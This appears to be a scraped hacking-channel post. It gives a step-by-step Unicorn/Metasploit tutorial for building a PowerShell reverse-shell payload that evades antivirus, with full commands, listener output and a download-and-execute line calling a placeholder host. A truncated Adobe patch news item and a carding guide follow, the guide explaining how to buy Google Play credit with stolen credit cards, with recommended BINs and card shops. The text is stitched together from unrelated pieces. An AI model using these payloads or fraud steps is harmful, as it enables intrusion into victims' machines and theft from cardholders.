Step 2

Install Unicorn

With the Metasploit installation taken care of, the Unicorn GitHub repository can be cloned using git clone github.com/trustedsec/unicorn.

@hackersworldunite

git clone https://github.com/trustedsec/unicorn

Cloning into 'unicorn'...
remote: Counting objects: 340, done.
remote: Total 340 (delta 0), reused 0 (delta 0), pack-reused 340
Receiving objects: 100% (340/340), 163.94 KiB | 45.00 KiB/s, done.
Resolving deltas: 100% (215/215), done

Then, change into the new Unicorn directory using the cd command.

cd unicorn/

To view the available Unicorn options and comprehensive descriptions of each attack, use the ./unicorn.py --help argument.

@free_hacking_tutorial

/unicorn.py --help

-------------------- Magic Unicorn Attack Vector v3.1 -----------------------------

Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates

Happy Magic Unicorns.

Usage: python unicorn.py payload reverse_ipaddr port gtoptional hta or macro, crtlt
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py gtcobalt_strike_file.cslt cs macro
Macro Example Shellcode: python unicorn.py gtpath_to_shellcode.txtlt shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py gtcobalt_strike_file.cslt cs hta
HTA Example Shellcode: python unicorn.py gtpath_to_shellcode.txtlt: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py gtpath_to_payload/exe_encodelt crt
Custom PS1 Example: python unicorn.py gtpath to ps1 filelt
Custom PS1 Example: python unicorn.py gtpath to ps1 filelt macro 500
Cobalt Strike Example: python unicorn.py gtcobalt_strike_file.cslt cs (export CS in C# format)
Custom Shellcode: python unicorn.py gtpath_to_shellcode.txtlt shellcode (formatted 0x00)
Help Menu: python unicorn.py --help

Step 3

Generate the Payload

To create a payload with Unicorn, use the below command.

./unicorn.py windows/meterpreter/reverse_https gtATTACKER-IP-ADDRESSlt gtPORTlt

Unicorn will use the Metasploit reverse_https module to connect to the attackers IP address using the specified port.

@free_hacking_tutorial

[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...

,/
//
,//
___ /| |//
__/\_ --(/|___/-/
\|\_-\___ __-_- /-/ \.
|\_-___,-\_____--/_)' ) \
\ -_ / __ \( ( __\|
\__| |\)\ ) /(/|
,._____., ',--//-| \ | ' /
/ __. \, / /,---| \ /
/ / _. \ \ /_/ _,' | |
| | ( ( \ | ,/\'__/'/ | |
| \ \--, _/_------______/ \( )/
| | \ \_. \, \___/\
| | \_ \ \ \
\ \ \_ \ \ / \
\ \ \._ \__ \_| | \
\ \___ \ \ | \
\__ \__ \ \_ | \ |
| \_____ \ ____ | |
| \ \__ ---' .__\ | | |
\ \__ --- / ) | \ /
\ \____/ / ()( \ ---_ /|
\__________/(,--__ \_________. | ./ |
| \ \ ---_\--, \ \_,./ |
| \ \_ \ /---_______-\ \\ /
\ \.___,| / \ \\ \
\ | \_ \| \ ( |: |
\ \ \ | / / | ;
\ \ \ \ ( _' \ |
\. \ \. \ / | |
\ \ \. \ | |
\ \ \ \ ( )
\ | \ | | |
| \ \ \ I `
( ; ( _; ('-_';
|___\ \___: \___:

aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=

Written by: Nahom

@free_hacking_tutorial
Happy Magic Unicorns.

[********************************************************************************************************]

-----POWER

SHELL ATTACK INSTRUCTIONS----

Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.

Note that you will need to have a listener enabled in order to capture the attack.

[*******************************************************************************************************]

[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.

When Unicorn is done generating the payload, two new files will be created. The first is powershell_attack.txt which can be viewed using the cat powershell_attack.txt command. This reveals the PowerShell code that will execute on the target Windows 10 machine and create the meterpreter connection.


@free_hacking_tutorial

The other file created by Unicorn is unicorn.rc, a resource file which will automate the msfconsole setup and configuration.

Step 4

Start Msfconsole Using the Resource File

To start Metasploit, run the msfconsole -r /opt/unicorn/unicorn.rc command.

@free_hacking_tutorial

msfconsole -r /opt/unicorn/unicorn.rc

=[ metasploit v4.16.59-dev- ]
+ -- --=[ 1769 exploits - 1008 auxiliary - 307 post ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /opt/unicorn/unicorn.rc for ERB directives.
resource (/opt/unicorn/unicorn.rc)> use multi/handler
resource (/opt/unicorn/unicorn.rc)> set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
resource (/opt/unicorn/unicorn.rc)> set LHOST 192.168.1.5
LHOST => 192.168.1.5
resource (/opt/unicorn/unicorn.rc)> set LPORT 443
LPORT => 443
resource (/opt/unicorn/unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (/opt/unicorn/unicorn.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/opt/unicorn/unicorn.rc)> exploit -j
[*] Exploit running as background job 0.

[-] Handler failed to bind to 192.168.1.5:443

msf exploit(multi/handler) > [*] Started HTTPS reverse handler on https://0.0.0.0:443

The resource file will automatically enable the handler (multi/handler), set the payload type (windows/meterpreter/reverse_https), set the attacker's IP address (LHOST), set the port number (LPORT), enable stager encoding (EnableStageEncoding), and start the msfconsole listener (exploit -j) — easy.

At this point, everything on the attacker's side is set up and ready for incoming connections. Now it's just a matter of verifying the payload works and effectively bypasses Windows Defender and antivirus software.

@free_hacking_tutorial

That's it for installing Metasploit, creating the PowerShell payload with Unicorn, and automating the msfconsole startup. Unicorn is a great tool which takes the difficulty out of creating sophisticated PowerShell payloads capable of bypassing popular antivirus software. In my follow up article, I'll show how to convert the PowerShell code into an executable and a few tricks for making the executable appear as an ordinary text file, so stay tuned.

@free_hacking_tutorial

Step 5

Test the Payload (Don't Upload It to VirusTotal)

In my tests, Unicorn's PowerShell payload was able to bypass Google Chrome, Windows Defender, and Avast antivirus detections in a fully patched Windows 10 Enterprise machine.

Many projects warn penetration testers of the dangers of using online virus scanners like VirusTotal. In the case of TheFatRat, the developer's explicitly caution against using VirusTotal every time the program starts.


As someone who regularly experiments with many antivirus evasion software, I completely understand the temptation to know if the created payload will evade detection of the most popular antivirus software technologies. However, uploading to online virus scanners is extremely damaging to these projects. VirusTotal shares uploaded payloads with third-parties and, as a result, their collective detection rates dramatically increase over a short period of time.

As an alternative to online scanners, I encourage pentester's to simulate their target's operating system environment using virtual machines. For example, if it's discovered that a target on the local network is using Windows 10 with AVG or Avast, create a Windows 10 VM, install the latest antivirus software in the VM, and test payloads inside the VM. This will give pentester's some reassurance that a payload is working properly and prevent VirusTotal from over-analyzing the malicious file and sharing its results with other companies.

@free_hacking_tutorial

@free_hacking_tutorial
Adobe Releases Security Patch Updates For 112 Vulnerabilities

Adobe has released security patches for a total 112 vulnerabilities in its products, most of which have a higher risk of being exploited.

The vulnerabilities addressed in this month's patch Tuesday affect Adobe Flash Player, Adobe Experience Manager, Adobe Connect, Adobe Acrobat, and Reader.

None of the security vulnerabilities patched this month were either publicly disclosed or found being
@free_hacking_tutorial

🎁 Google play store carding 🎁
➖➖➖➖➖➖➖➖➖➖➖➖
1.If you wanna card Google play and Google play gift card
👉 As usual clear your Cookies in browser via Ccleaner.
[According to the BIN, I have mentioned the IP below]

2. Then go to any app that is paid and below like 2$ or less , go to payment info.

3. Get your live CC from me or buy from shop like unicc, jstash etc..,

4. Bin recommended 517805,372739 ,417409 or amex gold ,capital one bank (only USA cc)

5. If you going for public cc I recommend Amex, are good for google play
❗️Even if the card dont have name and zip you can add any name and us zip because those bin are Non-AVS
[If you dont know what is Non-Avs / AVS the just click it to learn

6. Now save the card and ready to pay.

7. If the payment successful for that app,
👉 then go to buy google play credit and select your gift card 5$,10$,15$,25$ or 50$ .

8. Now all done and it will success mostly because of Non-AVS BIN.

9. Even if card declined after use, Google play never charge back and card showing declined will always work for small amount like 5$ after few weeks.
➖ @free_hacking_tutorial➖